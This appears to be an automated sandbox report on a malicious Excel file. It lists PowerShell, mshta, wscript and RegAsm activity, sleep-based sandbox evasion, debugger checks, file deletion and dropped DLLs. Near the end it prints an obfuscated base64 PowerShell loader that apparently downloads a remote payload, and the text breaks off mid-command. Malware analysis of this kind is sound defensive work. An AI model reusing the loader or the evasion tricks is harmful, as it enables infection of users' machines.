                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                  Source: PO_304234.xls Stream path 'Workbook' entropy: 7.99935565491 (max. 8.0)
                  Source: A7130000.0.dr Stream path 'Workbook' entropy: 7.99933786036 (max. 8.0)

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040F7E2 Sleep,ExitProcess, 28_2_0040F7E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 28_2_0041A7D9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6728Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3219Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 655Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 770Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1693Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2505Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 7482Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1348
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1348
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 474
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1876
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 919
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3489
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mjo4tj0d\mjo4tj0d.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\imlwlgjg\imlwlgjg.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.2 %
                  Source: C:\Windows\System32\mshta.exe TID: 3796Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep count: 6728 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956Thread sleep count: 3219 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4000Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2864Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2520Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900Thread sleep count: 1693 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2900Thread sleep count: 2952 > 30Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1032Thread sleep time: -60000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2040Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2040Thread sleep time: -3600000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2040Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2584Thread sleep count: 2505 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2584Thread sleep time: -7515000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2732Thread sleep time: -120000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2584Thread sleep count: 7482 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2584Thread sleep time: -22446000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\mshta.exe TID: 1484Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep count: 1348 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3332Thread sleep count: 1348 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3644Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3600Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4020Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 800Thread sleep count: 919 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 800Thread sleep count: 3489 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep time: -1200000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,28_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,28_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,28_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00407877 FindFirstFileW,FindNextFileW,28_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044E8F9 FindFirstFileExA,28_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,28_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,28_2_00407CD2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,28_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00443355 mov eax, dword ptr fs:[00000030h]28_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_004120B2 GetProcessHeap,HeapFree,28_2_004120B2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434BD8 SetUnhandledExceptionFilter,28_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_0043BB71

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2848, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3788, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? 